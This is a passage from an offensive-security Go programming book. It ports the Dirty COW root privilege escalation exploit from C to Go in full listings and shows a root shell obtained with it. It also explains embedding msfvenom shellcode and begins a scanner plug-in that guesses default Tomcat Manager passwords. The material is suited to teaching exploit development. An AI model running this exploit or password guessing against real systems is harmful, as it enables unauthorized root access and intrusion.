*procselfmemThread(void *arg) { char *str; str=(char*)arg; int f=open("/proc/self/mem",O_RDWR); int i,c=0; for(i=0;i<1000000 && !stop;i++) { lseek(f,map,SEEK_SET); c+=write(f, str, sc_len); } printf("thread stopped\n"); } void *waitForWrite(void *arg) { char buf[sc_len]; for(;;) { FILE *fp = fopen(suid_binary, "rb"); fread(buf, sc_len, 1, fp); if(memcmp(buf, sc, sc_len) == 0) { printf("%s is overwritten\n", suid_binary); break; } 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 203 fclose(fp); sleep(1); } stop = 1; printf("Popping root shell.\n"); printf("Don't forget to restore /tmp/bak\n"); system(suid_binary); } int main(int argc,char *argv[]) { char *backup; printf("DirtyCow root privilege escalation\n"); printf("Backing up %s.. to /tmp/bak\n", suid_binary); asprintf(&backup, "cp %s /tmp/bak", suid_binary); system(backup); f = open(suid_binary,O_RDONLY); fstat(f,&st); printf("Size of binary: %d\n", st.st_size); char payload[st.st_size]; memset(payload, 0x90, st.st_size); memcpy(payload, sc, sc_len+1); map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); printf("Racing, this may take a while..\n"); pthread_create(&pth1, NULL, &madviseThread, suid_binary); pthread_create(&pth2, NULL, &procselfmemThread, payload); pthread_create(&pth3, NULL, &waitForWrite, NULL); pthread_join(pth3, NULL); return 0; } Listing 9-5: The Dirty COW privilege escalation exploit written in the C language Rather than explaining the details of the C code’s logic, let’s look at it generally, and then break it into chunks to compare it line by line with the Go version. The exploit defines some malicious shellcode, in Executable and Linkable Format (ELF), that generates a Linux shell. It executes the code as a privi- leged user by creating multiple threads that call various system functions to write our shellcode to memory locations. Eventually, the shellcode exploits the vulnerability by overwriting the contents of a binary executable file that happens to have the SUID bit set and belongs to the root user. In this case, 前沿信安资讯阵地 公众号:i nf osrc 204 Chapter 9 that binary is /usr/bin/passwd. Normally, a nonroot user wouldn’t be able to overwrite the file. However, because of the Dirty COW vulnerability, you achieve privilege escalation because you can write arbitrary contents to the file while preserving the file permissions. Now let’s break the C code into easily digestible portions and com- pare each section with its equivalent in Go. Note that the Go version is specifically trying to achieve a line-by-line reproduction of the C version. Listing 9-6 shows the global variables defined or initialized outside our functions in C, while Listing 9-7 shows them in Go. u void *map; int f; v int stop = 0; struct stat st; char *name; pthread_t pth1,pth2,pth3; // change if no permissions to read w char suid_binary[] = "/usr/bin/passwd"; x unsigned char sc[] = { 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, --snip-- 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 }; unsigned int sc_len = 177; Listing 9-6: Initialization in C u var mapp uintptr v var signals = make(chan bool, 2) w const SuidBinary = "/usr/bin/passwd" x var sc = []byte{ 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, --snip-- 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05, } Listing 9-7: Initialization in Go The translation between C and Go is fairly straightforward. The two code sections, C and Go, maintain the same numbering to demonstrate how Go achieves similar functionality to the respective lines of C code. In both cases, you track mapped memory by defining a uintptr variable u. In Go, you declare the variable name as mapp since, unlike C, map is a reserved keyword in Go. You then initialize a variable to be used for signaling the threads to stop processing v. Rather than use an integer, as the C code does, the Go convention is instead to use a buffered boolean channel. You explic- itly define its length to be 2 since there will be two concurrent functions that you’ll wish to signal. Next, you define a string to your SUID executable w 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 205 and wrap up your global variables by hardcoding your shellcode into a slice x. A handful of global variables were omitted in the Go code com- pared to the C version, which means you’ll define them as needed within their respective code blocks. Next, let’s look at madvise() and procselfmem(), the two primary func- tions that exploit the race condition. Again, we’ll compare the C version in Listing 9-8 with the Go version in Listing 9-9. void *madviseThread(void *arg) { char *str; str=(char*)arg; int i,c=0; for(i=0;i<1000000 && !stop;i++u) { c+=madvise(map,100,MADV_DONTNEED)v; } printf("thread stopped\n"); } void *procselfmemThread(void *arg) { char *str; str=(char*)arg; int f=open("/proc/self/mem",O_RDWR); int i,c=0; for(i=0;i<1000000 && !stop;i++u) { w lseek(f,map,SEEK_SET); c+=write(f, str, sc_len)x; } printf("thread stopped\n"); } Listing 9-8: Race condition functions in C func madvise() { for i := 0; i < 1000000; i++ { select { case <- signals: u fmt.Println("madvise done") return default: syscall.Syscall(syscall.SYS_MADVISE, mapp, uintptr(100), syscall.MADV_DONTNEED) v } } } func procselfmem(payload []byte) { f, err := os.OpenFile("/proc/self/mem", syscall.O_RDWR, 0) if err != nil { log.Fatal(err) } 前沿信安资讯阵地 公众号:i nf osrc 206 Chapter 9 for i := 0; i < 1000000; i++ { select { case <- signals: u fmt.Println("procselfmem done") return default: syscall.Syscall(syscall.SYS_LSEEK, f.Fd(), mapp, uintptr(os.SEEK_SET)) w f.Write(payload) x } } } Listing 9-9: Race condition functions in Go The race condition functions use variations for signaling u. Both func- tions contain for loops that iterate an extensive number of times. The C ver- sion checks the value of the stop variable, while the Go version uses a select statement that attempts to read from the signals channel. When a signal is present, the function returns. In the event that no signal is waiting, the default case executes. The primary differences between the madvise() and procselfmem() functions occur within the default case. Within our madvise() function, you issue a Linux system call to the madvise() v function, whereas your procselfmem() function issues Linux system calls to lseek() w and writes your payload to memory x. Here are the main differences between the C and Go versions of these functions: • The Go version uses a channel to determine when to prematurely break the loop, while the C function uses an integer value to signal when to break the loop after the thread race condition has occurred. • The Go version uses the syscall package to issue Linux system calls. The parameters passed to the function include the system function to be called and its required parameters. You can find the name, purpose, and parameters of the function by searching Linux documentation. This is how we are able to call native Linux functions. Now, let’s review the waitForWrite() function, which monitors for the presence of changes to SUID in order to execute the shellcode. The C ver- sion is shown in Listing 9-10, and the Go version is shown in Listing 9-11. void *waitForWrite(void *arg) { char buf[sc_len]; u for(;;) { FILE *fp = fopen(suid_binary, "rb"); fread(buf, sc_len, 1, fp); if(memcmp(buf, sc, sc_len) == 0) { printf("%s is overwritten\n", suid_binary); break; } 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 207 fclose(fp); sleep(1); } v stop = 1; printf("Popping root shell.\n"); printf("Don't forget to restore /tmp/bak\n"); w system(suid_binary); } Listing 9-10: The waitForWrite() function in C func waitForWrite() { buf := make([]byte, len(sc)) u for { f, err := os.Open(SuidBinary) if err != nil { log.Fatal(err) } if _, err := f.Read(buf); err != nil { log.Fatal(err) } f.Close() if bytes.Compare(buf, sc) == 0 { fmt.Printf("%s is overwritten\n", SuidBinary) break } time.Sleep(1*time.Second) } v signals <- true signals <- true fmt.Println("Popping root shell") fmt.Println("Don't forget to restore /tmp/bak\n") attr := os.ProcAttr { Files: []*os.File{os.Stdin, os.Stdout, os.Stderr}, } proc, err := os.StartProcess(SuidBinary, nil, &attr) w if err !=nil { log.Fatal(err) } proc.Wait() os.Exit(0) } Listing 9-11: The waitForWrite() function in Go 前沿信安资讯阵地 公众号:i nf osrc 208 Chapter 9 In both cases, the code defines an infinite loop that monitors the SUID binary file for changes u. While the C version uses memcmp() to check whether the shellcode has been written to the target, the Go code uses bytes.Compare(). When the shellcode is present, you’ll know the exploit succeeded in overwrit- ing the file. You then break out of the infinite loop and signal the running threads that they can now stop v. As with the code for the race conditions, the Go version does this via a channel, while the C version uses an integer. Lastly, you execute what is probably the best part of the function: the SUID target file that now has your malicious code within it w. The Go version is a little bit more verbose, as you need to pass in attributes corresponding to stdin, stdout, and stderr: files pointers to open input files, output files, and error file descriptors, respectively. Now let’s look at our main() function, which calls the previous functions necessary to execute this exploit. Listing 9-12 shows the C version, and Listing 9-13 shows the Go version. int main(int argc,char *argv[]) { char *backup; printf("DirtyCow root privilege escalation\n"); printf("Backing up %s.. to /tmp/bak\n", suid_binary); u asprintf(&backup, "cp %s /tmp/bak", suid_binary); system(backup); v f = open(suid_binary,O_RDONLY); fstat(f,&st); printf("Size of binary: %d\n", st.st_size); w char payload[st.st_size]; memset(payload, 0x90, st.st_size); memcpy(payload, sc, sc_len+1); x map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); printf("Racing, this may take a while..\n"); y pthread_create(&pth1, NULL, &madviseThread, suid_binary); pthread_create(&pth2, NULL, &procselfmemThread, payload); pthread_create(&pth3, NULL, &waitForWrite, NULL); pthread_join(pth3, NULL); return 0; } Listing 9-12: The main() function in C 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 209 func main() { fmt.Println("DirtyCow root privilege escalation") fmt.Printf("Backing up %s.. to /tmp/bak\n", SuidBinary) u backup := exec.Command("cp", SuidBinary, "/tmp/bak") if err := backup.Run(); err != nil { log.Fatal(err) } v f, err := os.OpenFile(SuidBinary, os.O_RDONLY, 0600) if err != nil { log.Fatal(err) } st, err := f.Stat() if err != nil { log.Fatal(err) } fmt.Printf("Size of binary: %d\n", st.Size()) w payload := make([]byte, st.Size()) for i, _ := range payload { payload[i] = 0x90 } for i, v := range sc { payload[i] = v } x mapp, _, _ = syscall.Syscall6( syscall.SYS_MMAP, uintptr(0), uintptr(st.Size()), uintptr(syscall.PROT_READ), uintptr(syscall.MAP_PRIVATE), f.Fd(), 0, ) fmt.Println("Racing, this may take a while..\n") y go madvise() go procselfmem(payload) waitForWrite() } Listing 9-13: The main() function in Go The main() function starts by backing up the target executable u. Since you’ll eventually be overwriting it, you don’t want to lose the original ver- sion; doing so may adversely affect the system. While C allows you to run an operating system command by calling system() and passing it the entire command as a single string, the Go version relies on the exec.Command() func- tion, which requires you to pass the command as separate arguments. Next, you open the SUID target file in read-only mode v, retrieving the file stats, 前沿信安资讯阵地 公众号:i nf osrc 210 Chapter 9 and then use them to initialize a payload slice of identical size as the tar- get file w. In C, you fill the array with NOP (0x90) instructions by calling memset(), and then copy over a portion of the array with your shellcode by calling memcpy(). These are convenience functions that don’t exist in Go. Instead, in Go, you loop over the slice elements and manually populate them one byte at a time. After doing so, you issue a Linux system call to the mapp() function x, which maps the contents of your target SUID file to memory. As for previous system calls, you can find the parameters needed for mapp() by searching the Linux documentation. You may notice that the Go code issues a call to syscall.Syscall6() rather than syscall.Syscall(). The Syscall6() function is used for system calls that expect six input parameters, as is the case with mapp(). Lastly, the code spins up a couple of threads, call- ing the madvise() and procselfmem() functions concurrently y. As the race condition ensues, you call your waitForWrite() function, which monitors for changes to your SUID file, signals the threads to stop, and executes your malicious code. For completeness, Listing 9-14 shows the entirety of the ported Go code. var mapp uintptr var signals = make(chan bool, 2) const SuidBinary = "/usr/bin/passwd" var sc = []byte{ 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, --snip-- 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05, } func madvise() { for i := 0; i < 1000000; i++ { select { case <- signals: fmt.Println("madvise done") return default: syscall.Syscall(syscall.SYS_MADVISE, mapp, uintptr(100), syscall.MADV_DONTNEED) } } } func procselfmem(payload []byte) { f, err := os.OpenFile("/proc/self/mem", syscall.O_RDWR, 0) if err != nil { log.Fatal(err) } for i := 0; i < 1000000; i++ { select { case <- signals: fmt.Println("procselfmem done") return default: syscall.Syscall(syscall.SYS_LSEEK, f.Fd(), mapp, uintptr(os.SEEK_SET)) 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 211 f.Write(payload) } } } func waitForWrite() { buf := make([]byte, len(sc)) for { f, err := os.Open(SuidBinary) if err != nil { log.Fatal(err) } if _, err := f.Read(buf); err != nil { log.Fatal(err) } f.Close() if bytes.Compare(buf, sc) == 0 { fmt.Printf("%s is overwritten\n", SuidBinary) break } time.Sleep(1*time.Second) } signals <- true signals <- true fmt.Println("Popping root shell") fmt.Println("Don't forget to restore /tmp/bak\n") attr := os.ProcAttr { Files: []*os.File{os.Stdin, os.Stdout, os.Stderr}, } proc, err := os.StartProcess(SuidBinary, nil, &attr) if err !=nil { log.Fatal(err) } proc.Wait() os.Exit(0) } func main() { fmt.Println("DirtyCow root privilege escalation") fmt.Printf("Backing up %s.. to /tmp/bak\n", SuidBinary) backup := exec.Command("cp", SuidBinary, "/tmp/bak") if err := backup.Run(); err != nil { log.Fatal(err) } f, err := os.OpenFile(SuidBinary, os.O_RDONLY, 0600) if err != nil { log.Fatal(err) } st, err := f.Stat() if err != nil { 前沿信安资讯阵地 公众号:i nf osrc 212 Chapter 9 log.Fatal(err) } fmt.Printf("Size of binary: %d\n", st.Size()) payload := make([]byte, st.Size()) for i, _ := range payload { payload[i] = 0x90 } for i, v := range sc { payload[i] = v } mapp, _, _ = syscall.Syscall6( syscall.SYS_MMAP, uintptr(0), uintptr(st.Size()), uintptr(syscall.PROT_READ), uintptr(syscall.MAP_PRIVATE), f.Fd(), 0, ) fmt.Println("Racing, this may take a while..\n") go madvise() go procselfmem(payload) waitForWrite() } Listing 9-14: The complete Go port (/ch-9/dirtycow/main.go/) To confirm that your code works, run it on your vulnerable host. There’s nothing more satisfying than seeing a root shell. alice@ubuntu:~$ go run main.go DirtyCow root privilege escalation Backing up /usr/bin/passwd.. to /tmp/bak Size of binary: 47032 Racing, this may take a while.. /usr/bin/passwd is overwritten Popping root shell procselfmem done Don't forget to restore /tmp/bak root@ubuntu:/home/alice# id uid=0(root) gid=1000(alice) groups=0(root),4(adm),1000(alice) As you can see, a successful run of the program backs up the /usr/bin /passwd file, races for control of the handle, overwrites the file location with the newly intended values, and finally produces a system shell. The output of the Linux id command confirms that the alice user account has been elevated to a uid=0 value, indicating root-level privilege. 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 213 Creating Shellcode in Go In the previous section, you used raw shellcode in valid ELF format to over- write a legitimate file with your malicious alternative. How might you gener- ate that shellcode yourself? As it turns out, you can use your typical toolset to generate Go-friendly shellcode. We’ll show you how to do this with msfvenom, a command-line utility, but the integration techniques we’ll teach you aren’t tool-specific. You can use several methods to work with external binary data, be it shellcode or some- thing else, and integrate it into your Go code. Rest assured that the following pages deal more with common data representations than anything specific to a tool. The Metasploit Framework, a popular exploitation and post-exploitation toolkit, ships with msfvenom, a tool that generates and transforms any of Metasploit’s available payloads to a variety of formats specified via the –f argument. Unfortunately, there is no explicit Go transform. However, you can integrate several formats into your Go code fairly easily with minor adjustments. We’ll explore five of these formats here: C, hex, num, raw, and Base64, while keeping in mind that our end goal is to create a byte slice in Go. C Transform If you specify a C transform type, msfvenom will produce the payload in a for- mat that you can directly place into C code. This may seem like the logical first choice, since we detailed many of the similarities between C and Go earlier in this chapter. However, it’s not the best candidate for our Go code. To show you why, look at the following sample output in C format: unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" --snip-- "\x64\x00"; We’re interested almost exclusively in the payload. To make it Go-friendly, you’ll have to remove the semicolon and alter the line breaks. This means you’ll either need to explicitly append each line by adding a + to the end of all lines except the last, or remove the line breaks altogether to produce one long, continuous string. For small payloads this may be acceptable, but for larger payloads this becomes tedious to do manually. You’ll find yourself likely turning to other Linux commands such as sed and tr to clean it up. Once you clean up the payload, you’ll have your payload as a string. To create a byte slice, you’d enter something like this: payload := []byte("\xfc\xe8\x82..."). It’s not a bad solution, but you can do better. 前沿信安资讯阵地 公众号:i nf osrc 214 Chapter 9 Hex Transform Improving upon the previous attempt, let’s look at a hex transform. With this format, msfvenom produces a long, continuous string of hexadecimal characters: fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ff...6400 If this format looks familiar, it’s because you used it when porting the Java deserialization exploit. You passed this value as a string into a call to hex.DecodeString(). It returns a byte slice and error details, if present. You could use it like so: payload, err := hex.DecodeString("fce8820000006089e531c0648b50308b520c8b52148b 72280fb74a2631ff...6400") Translating this to Go is pretty simple. All you have to do is wrap your string in double quotes and pass it to the function. However, a large payload will produce a string that may not be aesthetically pleasing, wrapping lines or running beyond recommended page margins. You may still want to use this format, but we’ve provided a third alternative in the event that you want your code to be both functional and pretty. Num Transform A num transform produces a comma-separated list of bytes in numerical, hexadecimal format: 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, --snip-- 0x64, 0x00 You can use this output in the direct initialization of a byte slice, like so: payload := []byte{ 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, --snip-- 0x64, 0x00, } Because the msfvenom output is comma-separated, the list of bytes can wrap nicely across lines without clumsily appending data sets. The only modification required is the addition of a single comma after the last element in the list. This output format is easily integrated into your Go code and formatted pleasantly. 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 215 Raw Transform A raw transform produces the payload in raw binary format. The data itself, if displayed on the terminal window, likely produces unprintable characters that look something like this: `1dP0R 8u};}$uXX$fY ӋI:I41 You can’t use this data in your code unless you produce it in a differ- ent format. So why, you may ask, are we even discussing raw binary data? Well, because it’s fairly common to encounter raw binary data, whether as a payload generated from a tool, the contents of a binary file, or crypto keys. Knowing how to recognize binary data and work it into your Go code will prove valuable. Using the xxd utility in Linux with the –i command line switch, you can easily transform your raw binary data into the num format of the previ- ous section. A sample msfvenom command would look like this, where you pipe the raw binary output produced by msfvenom into the xxd command: $ msfvenom -p [payload] [options] –f raw | xxd -i You can assign the result directly to a byte slice as demonstrated in the previous section. Base64 Encoding Although msfvenom doesn’t include a pure Base64 encoder, it’s fairly common to encounter binary data, including shellcode, in Base64 format. Base64 encoding extends the length of your data, but also allows you to avoid ugly or unusable raw binary data. This format is easier to work with in your code than num, for example, and can simplify data transmission over protocols such as HTTP. For that reason, it’s worth discussing its usage in Go. The easiest method to produce a Base64-encoded representation of binary data is to use the base64 utility in Linux. It allows you to encode or decode data via stdin or from a file. You could use msfvenom to produce raw binary data, and then encode the result by using the following command: $ msfvenom -p [payload] [options] –f raw | base64 Much like your C output, the resulting payload contains line breaks that you’ll have to deal with before including it as a string in your code. You can use the tr utility in Linux to clean up the output, removing all line breaks: $ msfvenom -p [payload] [options] –f raw | base64 | tr –d "\n" 前沿信安资讯阵地 公众号:i nf osrc 216 Chapter 9 The encoded payload will now exist as a single, continuous string. In your Go code, you can then get the raw payload as a byte slice by decoding the string. You use the encoding/base64 package to get the job done: payload, err := base64.StdEncoding.DecodeString("/OiCAAAAYInlMcBki1Awi...WFuZAA=") You’ll now have the ability to work with the raw binary data without all the ugliness. A Note on Assembly A discussion of shellcode and low-level programming isn’t complete without at least mentioning assembly. Unfortunately for the shellcode composers and assembly artists, Go’s integration with assembly is limited. Unlike C, Go doesn’t support inline assembly. If you want to integrate assembly into your Go code, you can do that, sort of. You’ll have to essentially define a func- tion prototype in Go with the assembly instructions in a separate file. You then run go build to compile, link, and build your final executable. While this may not seem overly daunting, the problem is the assembly language itself. Go supports only a variation of assembly based on the Plan 9 operat- ing system. This system was created by Bell Labs and used in the late 20th century. The assembly syntax, including available instructions and opcodes, is almost nonexistent. This makes writing pure Plan 9 assembly a daunting, if not nearly impossible, task. Summary Despite lacking assembly usability, Go’s standard packages offer a tremen- dous amount of functionality conducive to vulnerability hunters and exploit developers. This chapter covered fuzzing, porting exploits, and handling binary data and shellcode. As an additional learning exercise, we encourage you to explore the exploit database at https://www.exploit-db.com/ and try to port an existing exploit to Go. Depending on your comfort level with the source language, this task could seem overwhelming but it can be an excel- lent opportunity to understand data manipulation, network communica- tions, and low-level system interaction. In the next chapter, we’ll step away from exploitation activities and focus on producing extendable toolsets. 前沿信安资讯阵地 公众号:i nf osrc 10 GO PL U G IN S A N D E X T E N DA BL E T OOL S Many security tools are constructed as frameworks—core components, built with a level of abstraction that allows you to easily extend their functionality. If you think about it, this makes a lot of sense for security practitioners. The industry is constantly changing; the community is always inventing new exploits and techniques to avoid detection, creat- ing a highly dynamic and somewhat unpredictable landscape. However, by using plug-ins and extensions, tool developers can future-proof their products to a degree. By reusing their tools’ core components without making cumbersome rewrites, they can handle industry evolution grace- fully through a pluggable system. This, coupled with massive community involvement, is arguably how the Metasploit Framework has managed to age so well. Hell, even commer- cial enterprises like Tenable see the value in creating extendable products; Tenable relies on a plug-in-based system to perform signature checks within its Nessus vulnerability scanner. 前沿信安资讯阵地 公众号:i nf osrc 218 Chapter 10 In this chapter, you’ll create two vulnerability scanner extensions in Go. You’ll first do this by using the native Go plug-in system and explicitly compiling your code as a shared object. Then you’ll rebuild the same plug- in by using an embedded Lua system, which predates the native Go plug-in system. Keep in mind that, unlike creating plug-ins in other languages, such as Java and Python, creating plug-ins in Go is a fairly new construct. Native support for plug-ins has existed only since Go version 1.8. Further, it wasn’t until Go version 1.10 that you could create these plug-ins as Windows dynamic link libraries (DLLs). Make sure you’re running the latest version of Go so that all the examples in this chapter work as planned. Using Go’s Native Plug-in System Prior to version 1.8 of Go, the language didn’t support plug-ins or dynamic runtime code extendibility. Whereas languages like Java allow you to load a class or JAR file when you execute your program to instantiate the imported types and call their functions, Go provided no such luxury. Although you could sometimes extend functionality through interface implementations and such, you couldn’t truly dynamically load and execute the code itself. Instead, you needed to properly include it during compile time. As an example, there was no way to replicate the Java functionality shown here, which dynamically loads a class from a file, instantiates the class, and calls someMethod() on the instance: File file = new File("/path/to/classes/"); URL[] urls = new URL[]{file.toURL()}; ClassLoader cl = new URLClassLoader(urls); Class clazz = cl.loadClass("com.example.MyClass"); clazz.getConstructor().newInstance().someMethod(); Luckily, the later versions of Go have the ability to mimic this function- ality, allowing developers to compile code explicitly for use as a plug-in. Limitations exist, though. Specifically, prior to version 1.10, the plug-in system worked only on Linux, so you’d have to deploy your extendable framework on Linux. Go’s plug-ins are created as shared objects during the building process. To produce this shared object, you enter the following build command, which supplies plugin as the buildmode option: $ go build -buildmode=plugin Alternatively, to build a Windows DLL, use c-shared as the buildmode option: $ go build -buildmode=c-shared To build a Windows DLL, your program must meet certain conventions to export your functions and also must import the C library. We’ll let you explore these details on your own. Throughout this chapter, we’ll focus 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 219 almost exclusively on the Linux plug-in variant, since we’ll demonstrate how to load and use DLLs in Chapter 12. After you’ve compiled to a DLL or shared object, a separate program can load and use the plug-in at runtime. Any of the exported functions will be accessible. To interact with the exported features of a shared object, you’ll use Go’s plugin package. The functionality in the package is straight- forward. To use a plug-in, follow these steps: 1. Call plugin.Open(filename string) to open a shared object file, creating a *plugin.Plugin instance. 2. On the *plugin.Plugin instance, call Lookup(symbolName string) to retrieve a Symbol (that is, an exported variable or function) by name. 3. Use a type assertion to convert the generic Symbol to the type expected by your program. 4. Use the resulting converted object as desired. You may have noticed that the call to Lookup() requires the consumer to supply a symbol name. This means that the consumer must have a pre- defined, and hopefully publicized, naming scheme. Think of it as almost a defined API or generic interface to which plug-ins will be expected to adhere. Without a standard naming scheme, new plug-ins would require you to make changes to the consumer code, defeating the entire purpose of a plug-in-based system. In the examples that follow, you should expect plug-ins to define an exported function named New() that returns a specific interface type. That way, you’ll be able to standardize the bootstrapping process. Getting a handle back to an interface allows us to call functions on the object in a predictable way. Now let’s start creating your pluggable vulnerability scanner. Each plug- in will implement its own signature-checking logic. Your main scanner code will bootstrap the process by reading your plug-ins from a single directory on your filesystem. To make this all work, you’ll have two separate reposi- tories: one for your plug-ins and one for the main program that consumes the plug-ins. Creating the Main Program Let’s start with your main program, to which you’ll attach your plug-ins. This will help you understand the process of authoring your plug-ins. Set up your repository’s directory structure so it matches the one shown here: $ tree . --- cmd --- scanner --- main.go --- plugins --- scanner --- scanner.go 前沿信安资讯阵地 公众号:i nf osrc 220 Chapter 10 The file called cmd/scanner/main.go is your command line utility. It will load the plug-ins and initiate a scan. The plugins directory will contain all the shared objects that you’ll load dynamically to call various vulnerability signature checks. You’ll use the file called scanner/scanner.go to define the data types your plug-ins and main scanner will use. You put this data into its own package to make it a little bit easier to use. Listing 10-1 shows what your scanner.go file looks like. (All the code list- ings at the root location of / exist under the provided github repo https:// github.com/blackhat-go/bhg/.) package scanner // Scanner defines an interface to which all checks adhere u type Checker interface { v Check(host string, port uint64) *Result } // Result defines the outcome of a check w type Result struct { Vulnerable bool Details string } Listing 10-1: Defining core scanner types (/ch-10/plugin-core/scanner/scanner.go) In this package, named scanner, you define two types. The first is an interface called Checker u. The interface defines a single method named Check() v, which accepts a host and port value and returns a pointer to a Result. Your Result type is defined as a struct w. Its purpose is to track the outcome of the check. Is the service vulnerable? What details are pertinent in documenting, validating, or exploiting the flaw? You’ll treat the interface as a contract or blueprint of sorts; a plug-in is free to implement the Check() function however it chooses, so long as it returns a pointer to a Result. The logic of the plug-in’s implementation will vary based on each plug-in’s vulnerability-checking logic. For instance, a plug-in checking for a Java deserialization issue can implement the proper HTTP calls, whereas a plug-in checking for default SSH credentials can issue a password-guessing attack against the SSH service. The power of abstraction! Next, let’s review cmd/scanner/main.go, which will consume your plug-ins (Listing 10-2). const PluginsDir = "../../plugins/" u func main() { var ( files []os.FileInfo err error p *plugin.Plugin n plugin.Symbol check scanner.Checker 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 221 res *scanner.Result ) if files, err = ioutil.ReadDir(PluginsDir)v; err != nil { log.Fatalln(err) } for idx := range files { w fmt.Println("Found plugin: " + files[idx].Name()) if p, err = plugin.Open(PluginsDir + "/" + files[idx].Name())x; err != nil { log.Fatalln(err) } if n, err = p.Lookup("New")y; err != nil { log.Fatalln(err) } newFunc, ok := n.(func() scanner.Checker) z if !ok { log.Fatalln("Plugin entry point is no good. Expecting: func New() scanner.Checker{ ... }") } check = newFunc(){ res = check.Check("", 8080) | if res.Vulnerable { } log.Println("Host is vulnerable: " + res.Details) } else { log.Println("Host is NOT vulnerable") } } } Listing 10-2: The scanner client that runs plug-ins (/ch-10/plugin-core /cmd/scanner/main.go) The code starts by defining the location of your plug-ins u. In this case, you’ve hardcoded it; you could certainly improve the code so it reads this value in as an argument or environment variable instead. You use this vari- able to call ioutil.ReadDir(PluginDir) and obtain a file listing v, and then loop over each of these plug-in files w. For each file, you use Go’s plugin package to read the plug-in via a call to plugin.Open() x. If this succeeds, you’re given a *plugin.Plugin instance, which you assign to the variable named p. You call p.Lookup("New") to search your plug-in for a symbol named New y. As we mentioned during the high-level overview earlier, this symbol lookup convention requires your main program to provide the explicit name of the symbol as an argument, meaning you expect the plug-in to have an exported symbol by the same name—in this case, our main program is looking for the symbol named New. Furthermore, as you’ll see shortly, the code expects the symbol to be a function that will return a concrete implementation of your scanner.Checker interface, which we dis- cussed in the previous section. Assuming your plug-in contains a symbol named New, you make a type assertion for the symbol as you try to convert it to type func() scanner.Checker z. That is, you’re expecting the symbol to be a func- tion that returns an object implementing scanner.Checker. You assign 前沿信安资讯阵地 公众号:i nf osrc 222 Chapter 10 the converted value to a variable named newFunc. Then you invoke it and assign the returned value to a variable named check {. Thanks to your type assertion, you know that check satisfies your scanner.Checker interface, so it must implement a Check() function. You call it, passing in a target host and port |. The result, a *scanner.Result, is captured using a variable named res and inspected to determine whether the service was vulnerable or not }. Notice that this process is generic; it uses type assertions and inter- faces to create a construct through which you can dynamically call plug- ins. Nothing within the code is specific to a single vulnerability signature or method used to check for a vulnerability’s existence. Instead, you’ve abstracted the functionality enough that plug-in developers can create stand-alone plug-ins that perform units of work without having knowledge of other plug-ins—or even extensive knowledge of the consuming applica- tion. The only thing that plug-in authors must concern themselves with is properly creating the exported New() function and a type that implements scanner.Checker. Let’s have a look at a plug-in that does just that. Building a Password-Guessing Plug-in This plug-in (Listing 10-3) performs a password-guessing attack against the Apache Tomcat Manager login portal. A favorite target for attackers, the portal is commonly configured to accept easily guessable credentials. With valid credentials, an attacker can reliably execute arbitrary code on the underlying system. It’s an easy win for attackers. In our review of the code, we won’t cover the specific details of the vul- nerability test, as it’s really just a series of HTTP requests issued to a specific URL. Instead, we’ll focus primarily on satisfying the pluggable scanner’s interface requirements. import ( // Some snipped for brevity "github.com/bhg/ch-10/plugin-core/scanner" u ) var Users = []string{"admin", "manager", "tomcat"} var Passwords = []string{"admin", "manager", "tomcat", "password"} // TomcatChecker implements the scanner.Check interface. Used for guessing Tomcat creds type TomcatChecker struct{} v // Check attempts to identify guessable Tomcat credentials func (c *TomcatChecker) Check(host string, port uint64) *scanner.Result { w var ( resp *http.Response err error url string res *scanner.Result client *http.Client req *http.Request ) log.Println("Checking for Tomcat Manager...") 前沿信安资讯阵地 公众号:i nf osrc Go Plugins and Extendable Tools 223 res = new(scanner.Result) x url = fmt.Sprintf("http://%s:%d/manager/html", host, port) if resp, err = http.Head(url); err != nil { log.Printf("HEAD request failed: %s\n", err) return res } log.Println("Host responded to /manager/html request") // Got a response back, check if authentication required if resp.StatusCode != http.StatusUnauthorized || resp.Header.Get("WWW-Authenticate") == "" { log.Println("Target doesn't appear to require Basic auth.") return res } // Appears authentication is required. Assuming Tomcat manager. Guess passwords... log.Println("Host requires authentication. Proceeding with password guessing...") client = new(http.Client) if req, err = http.NewRequest("GET", url, nil); err != nil { log.Println("Unable to build GET request") return res } for _, user := range Users { for _, password := range Passwords { req.SetBasicAuth(user, password) if resp, err = client.Do(req); err != nil { log.Println("Unable to send GET request") continue } if resp.StatusCode == http.StatusOK { y res.Vulnerable 